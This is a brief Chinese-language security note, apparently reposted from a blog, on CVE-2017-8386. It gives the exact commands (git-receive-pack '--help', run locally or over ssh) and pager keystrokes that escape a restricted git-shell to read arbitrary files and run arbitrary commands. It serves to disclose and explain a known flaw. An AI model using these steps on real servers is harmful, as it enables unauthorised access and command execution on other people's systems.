Git Shell Bypass
通过git读文件:
git-receive-pack '--help' #本地
ssh git@remoteserver "git-receive-pack '--help'" #远程服务器
打开以后按shift+e,然后输入要读的文件路径
通过git执行命令:
git-receive-pack '--help' #本地
ssh git@remoteserver "git-receive-pack '--help'" #远程服务器
输入!后输入要执行的命令:
详情:https://insinuator.net/2017/05/git-shell-bypass-by-abusing-less-cve-2017-8386/
文章出处:Evi1cg's blog
原文链接:https://evi1cg.me/archives/CVE_2017_8386.html